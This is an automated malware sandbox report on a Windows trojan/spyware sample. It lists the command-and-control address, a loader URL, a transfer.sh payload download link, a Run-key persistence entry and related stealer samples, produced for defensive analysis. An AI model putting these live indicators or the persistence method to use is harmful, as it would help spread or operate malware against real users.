http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
51.210.161.21:36108	1%	Virustotal		Browse
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
51.210.161.21:36108	0%	Avira URL Cloud	safe
http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys	0%	Avira URL Cloud	safe
http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
51.210.161.21:36108	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://transfer.sh/get/yAEPpl/gggge.exe	false		high
http://ip-api.com/json/?fields=query,status,countryCode,city,timezone	false		high
http://transfer.sh/get/yAEPpl/gggge.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys5	RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Responseon	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
http://tempuri.org/Entity/Id12Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adobe.c/g	RegSvcs.exe, 00000003.00000003.470027471.000000000156B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.485919190.000000000156E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id7	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6Response	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	123.exe, 123.exe, 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmp, RegSvcs.exe, 00000003.00000002.471223737.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id20	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.sh/get/yAEPpl/gggge.exesh9	RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1Response	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id17	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://84.252.73.140/loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys	RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	RegSvcs.exe, 00000003.00000002.489261613.0000000003290000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.00000000034FE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	RegSvcs.exe, 00000006.00000002.543163037.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.538488155.0000000003CB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.531533948.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, re.exe.6.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 00000003.00000002.489261613.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	RegSvcs.exe, 00000003.00000002.489261613.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.000000000443A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.0000000004457000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.489261613.0000000003464000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.500937348.00000000041F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	RegSvcs.exe, 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
84.252.73.140	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	false
51.210.161.21	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	833919
Start date and time:	2023-03-24 07:56:52 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	1JCAVkYU3U.exe
Original Sample Name:	719082dcc3c017e5b675c8b9ec74b6a1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/18@2/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 84.3% (good quality ratio 78.5%) Quality average: 78.3% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 93% Number of executed functions: 162 Number of non-executed functions: 171
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:58:03	API Interceptor	2x Sleep call for process: WerFault.exe modified
07:58:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
07:58:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RegSvcs "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
07:59:22	API Interceptor	35x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	ip-api.com/json
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	ip-api.com/json/?fields=query,status,countryCode,city,timezone
	SecuriteInfo.com.IL.Trojan.MSILZilla.25629.12905.1460.exe	Get hash	malicious	Unknown	Browse	ip-api.com/csv/?fields=status,query
	niURCe4yh9.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	ip-api.com/json
	HhZ2FJLhRe.exe	Get hash	malicious	Unknown	Browse	ip-api.com/csv/?fields=status,query
	bKJ7.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	bKJA.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	eYGjolSkCW.exe	Get hash	malicious	Eternity Stealer, RedLine	Browse	ip-api.com/json
	DIE5K18SdF.exe	Get hash	malicious	Gurcu Stealer	Browse	ip-api.com/line?fields=query
	04.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	ip-api.com/line/?fields=hosting
	x63a3bC9GCzb.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	1HYkac8PAl.apk	Get hash	malicious	Unknown	Browse	ip-api.com/json
	shipmentDocs9807654.pdf.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	ip-api.com/json/
	Service.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	ip-api.com//json/
	bKDP.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	contact_me.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	file.exe	Get hash	malicious	Gurcu Stealer	Browse	ip-api.com/line?fields=query
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line?fields=query

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	yDw1YzoT0c.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	208.95.112.1
	SecuriteInfo.com.IL.Trojan.MSILZilla.25629.12905.1460.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	niURCe4yh9.exe	Get hash	malicious	AgentTesla, Eternity Stealer	Browse	208.95.112.1
	HhZ2FJLhRe.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	bKJ7.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	bKJA.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	eYGjolSkCW.exe	Get hash	malicious	Eternity Stealer, RedLine	Browse	208.95.112.1
	DIE5K18SdF.exe	Get hash	malicious	Gurcu Stealer	Browse	208.95.112.1
	04.exe	Get hash	malicious	AveMaria, Clipboard Hijacker, StormKitty	Browse	208.95.112.1
	x63a3bC9GCzb.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	shipmentDocs9807654.pdf.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exe	Get hash	malicious	Njrat, STRRAT, WSHRAT	Browse	208.95.112.1
	Service.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	FiveM-CheatHub.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber, Orcus	Browse	208.95.112.1
	bKDP.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
